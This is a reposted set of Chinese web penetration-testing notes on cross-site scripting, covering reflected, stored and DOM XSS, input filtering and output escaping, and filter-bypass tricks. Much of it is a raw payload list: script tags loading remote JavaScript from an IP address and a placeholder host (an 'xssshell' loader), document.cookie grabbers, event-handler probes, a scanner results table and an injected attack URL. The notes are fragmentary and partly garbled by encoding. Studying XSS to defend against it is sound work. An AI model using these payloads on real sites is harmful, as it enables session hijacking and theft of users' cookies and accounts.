生活随笔
收集整理的這篇文章主要介紹了
Web渗透测试-Xss跨站脚本攻击(Cross Site Scripting)
小編覺(jué)得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.
Xss跨站腳本攻擊
- Xss通用明文 &&表單劫持
- 跨站腳本攻擊漏洞概念,
- 漏洞原理和危害,
- 掌握反射型、存儲(chǔ)型XSS漏洞利用方法
- web安全工程師-03-XSS漏洞原理與利用
- 第一章:XSS基礎(chǔ)
- 1.1 XSS介紹與原理~1
- 1.2 存儲(chǔ)型XSS實(shí)戰(zhàn)
- 1.3 反射型XSS實(shí)戰(zhàn)
- 1.4 DOM型XSS實(shí)戰(zhàn)
- 1.5 XSS輔助測(cè)試工具
- 第二章: XSS實(shí)戰(zhàn)與防御機(jī)制繞過(guò)
- 2.1 存儲(chǔ)型XSS多場(chǎng)景實(shí)戰(zhàn)及Bypass詳解
- 2.3 反射型XSS多場(chǎng)景實(shí)戰(zhàn)及Bypass詳解~1
- 2.4 DOM型XSS多場(chǎng)景實(shí)戰(zhàn)及Bypass詳解~1
- 第三章:XSS高級(jí)
淺談XSS漏洞挖掘 https
:有輸入的地方就試試,對(duì)可以觸發(fā)XSS的地方做總結(jié)輸入即輸出
對(duì)用戶的輸入在沒(méi)有進(jìn)行任何過(guò)濾的情況下進(jìn)行了輸出。
輸出報(bào)錯(cuò)信息的時(shí)候直接把用戶輸入的內(nèi)容直接進(jìn)行了輸出。
猜想可能由于現(xiàn)在對(duì)信息安全的重視,涉及到業(yè)務(wù)方面的輸入數(shù)據(jù)的過(guò)濾編碼已經(jīng)很成熟,
對(duì)一些錯(cuò)誤信息的輸出可能重視還不夠大。該漏洞的觸發(fā)就是在返回錯(cuò)誤信息的時(shí)候回返回方法名,這個(gè)方法名攻擊者可以自己定義,導(dǎo)致觸發(fā)了XSS漏洞
在返回錯(cuò)誤信息的時(shí)候回返回參數(shù)FUZZ參數(shù)觸發(fā)XSS
XSS(跨站腳本)概述
Cross-Site Scripting 簡(jiǎn)稱為“CSS”,
為避免與前端疊成樣式表的縮寫(xiě)"CSS"沖突,故又稱XSS。
一般XSS可以分為如下幾種常見(jiàn)類型:1.反射性XSS;2.存儲(chǔ)型XSS;
3.DOM型XSS;XSS漏洞一直被評(píng)估為web漏洞中危害較大的漏洞,
在OWASP TOP10的排名中一直屬于前三的江湖地位。XSS是一種發(fā)生在前端瀏覽器端的漏洞,所以其危害的對(duì)象也是前端用戶。形成XSS漏洞的主要原因是程序?qū)斎牒洼敵鰶](méi)有做合適的處理,
導(dǎo)致“精心構(gòu)造”的字符輸出在前端時(shí)被瀏覽器當(dāng)作有效代碼解析執(zhí)行從而產(chǎn)生危害。因此在XSS漏洞的防范上,
一般會(huì)采用“對(duì)輸入進(jìn)行過(guò)濾”和“輸出進(jìn)行轉(zhuǎn)義”的方式進(jìn)行處理: 輸入過(guò)濾:對(duì)輸入進(jìn)行過(guò)濾,不允許可能導(dǎo)致XSS攻擊的字符輸入;
輸出轉(zhuǎn)義:根據(jù)輸出點(diǎn)的位置對(duì)輸出到前端的內(nèi)容進(jìn)行適當(dāng)轉(zhuǎn)義;"'><textarea+autofocus+onfocus=alert(45)><iframe/src=JavaScriPt:alert(45)><script>alert(aming)</script><script src=”http://192.168.1.19/xssshell.jsp?v=336699″></script>
><script>alert(document.cookie)</script>
=’><script>alert(document.cookie)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
<script>alert(‘XSS’)</script>
<img src=”javascript:alert(‘XSS’)”>
<script>alert(‘Vulnerable’)</script>
<IFRAME SRC=javascript:alert(‘XSS’)></IFRAME>
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
<BODY ONLOAD=alert(‘XSS’)>
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
<SCRIPT a=”>” SRC=”http://xxxx/a.js”></SCRIPT>
<SCRIPT =”>” SRC=”http://xxxxx/a.js”></SCRIPT>
<SCRIPT a=”>” ” SRC=”http://xxxxx/a.js”></SCRIPT>
<SCRIPT “a=’>’” SRC=”http://xxxxx/a.js”></SCRIPT><img src=x onerror=alert(45)>
<svg/onload=alert(45)>
<script>alert(45)</script>
<img/src onerror=alert(45)>
"><iframe/src=JavaScriPt:alert(45)>
<video/poster/onerror=alert(45)>
<audio src onloadstart=alert(45)>
<meter onmouseover=alert(45)>0</meter>
<marquee onstart=alert(45)>
<select autofocus onfocus=alert(45)>
<input autofocus onfocus=alert(45)>
<keygen autofocus onfocus=alert(45)>
<textarea autofocus onfocus=alert(45)><original query>
onhwul=64
<svg/onload=alert(45)> | reflected XSS Code |
<script>alert(45)</script> | reflected XSS Code |
| 9 | HIGH | XSS | GET | type | <marquee onstart=alert(45)> | reflected HTML5 XSS Code |
| 10 | HIGH | XSS | GET | type | <meter onmouseover=alert(45)>0</meter> | reflected HTML5 XSS Code |
| 11 | HIGH | XSS | GET | type | <audio src onloadstart=alert(45)> | reflected HTML5 XSS Code |
| 12 | HIGH | XSS | GET | type | "><iframe/src=JavaScriPt:alert(45)> | reflected XSS Code |
| 13 | HIGH | XSS | GET | type | <video/poster/onerror=alert(45)> | reflected HTML5 XSS Code |
| 14 | HIGH | XSS | GET | type | <img/src onerror=alert(45)> | reflected XSS Code |
| 15 | HIGH | XSS | GET | type | <input autofocus onfocus=alert(45)> | reflected onfocus XSS Code |
| 16 | HIGH | XSS | GET | type | <keygen autofocus onfocus=alert(45)> | reflected onfocus XSS Code |
| 17 | HIGH | XSS | GET | type | <select autofocus onfocus=alert(45)> | reflected onfocus XSS Code |
<textarea autofocus onfocus=alert(45)> | reflected onfocus XSS Code |http://www.xxxx.com/tool/search.php?
title=88952634
&mod=main
&file=html
&action=index"'><textarea+autofocus+onfocus=alert(45)>
&dosubmit=1
Xss通用明文 &&表單劫持
-
跨站腳本攻擊漏洞概念,
-
漏洞原理和危害,
-
掌握反射型、存儲(chǔ)型XSS漏洞利用方法
web安全工程師-03-XSS漏洞原理與利用
第一章:XSS基礎(chǔ)
1.1 XSS介紹與原理~1
打cookie xss + csrf getshell
用來(lái)攻擊 使用瀏覽器 打開(kāi)這個(gè) 頁(yè)面的 用戶 獲取cookie 正常用戶/管理員 權(quán)限
反射型 - 非存儲(chǔ)型 通常 xss 代碼 Payload (js) 通過(guò) get 某個(gè)參數(shù) 傳入 后端
沒(méi)有經(jīng)過(guò) 存儲(chǔ) 直接反射回 用戶頁(yè)面 (html)上
存儲(chǔ)型payload 存 在某一介質(zhì) (數(shù)據(jù)庫(kù)、緩存、文件)用戶 查看這個(gè)頁(yè)面時(shí) 展示 頁(yè)面 取出數(shù)據(jù) 時(shí) 執(zhí)行
跟反射型類似但接受者 不再是 后端程序 而是 js 拿到參數(shù) 直接 在頁(yè)面 顯示
html 實(shí)體編碼 大多數(shù) 管用白名單 發(fā)表文章 富文本 過(guò)濾掉 js代碼 或者 涉及非法的屬性只div a p b 標(biāo)簽 排除onError、onLoad 事件屬性 只 src 黑名單 可能會(huì)繞過(guò)xss 業(yè)務(wù)場(chǎng)景 對(duì)癥 反射 get 輸入 script代碼塊 輸出
xss 流程
payload 構(gòu)造
驗(yàn)證
修復(fù)
xss 高階 新用法
xss持久化
xss系列
1.2 存儲(chǔ)型XSS實(shí)戰(zhàn)
被實(shí)體轉(zhuǎn)義
我日我自己
用戶登錄 憑證
換個(gè)用戶登錄
盜取cookie
怎么修復(fù)
看 數(shù)據(jù)庫(kù) 中 可控字段
1.3 反射型XSS實(shí)戰(zhàn)
通過(guò) url 參數(shù) 傳入 惡意代碼
value 閉合 掉
反射型 修復(fù)
orm 模型 查詢
剛才 訪問(wèn)頁(yè)面 自動(dòng)給 焦點(diǎn) 就會(huì)一直觸發(fā)
語(yǔ)法
閉合
或者 屬性 彈窗
html 實(shí)體轉(zhuǎn)義掉
1.4 DOM型XSS實(shí)戰(zhàn)
js 實(shí)現(xiàn)
dom型 不一定 是 url 傳過(guò)來(lái)的 參數(shù)
1.5 XSS輔助測(cè)試工具
繞過(guò)
第二章: XSS實(shí)戰(zhàn)與防御機(jī)制繞過(guò)
2.1 存儲(chǔ)型XSS多場(chǎng)景實(shí)戰(zhàn)及Bypass詳解
去掉空格 截?cái)嗪瘮?shù)
反斜杠 處理
處理 編碼問(wèn)題
數(shù)據(jù)展示 的 類
實(shí)體轉(zhuǎn)義 標(biāo)簽 防止 執(zhí)行
輸入 沒(méi)做處理
輸出 做了處理 沒(méi)做完全
編寫(xiě) payload
長(zhǎng)度限制 添加注釋
注釋 閉合 網(wǎng)頁(yè)標(biāo)簽
dom節(jié)點(diǎn)
多段提交
注釋 執(zhí)行
多點(diǎn)限制 加密 編碼
取值 得值 謹(jǐn)慎
2.3 反射型XSS多場(chǎng)景實(shí)戰(zhàn)及Bypass詳解~1
payload 多次 url 編碼
瀏覽器默認(rèn) 解碼一次 url編碼
2.4 DOM型XSS多場(chǎng)景實(shí)戰(zhàn)及Bypass詳解~1
存儲(chǔ) + DOM
漏洞 分析 + 挖掘
第三章:XSS高級(jí)
總結(jié)
以上是生活随笔為你收集整理的Web渗透测试-Xss跨站脚本攻击(Cross Site Scripting)的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。
如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò),歡迎將生活随笔推薦給好友。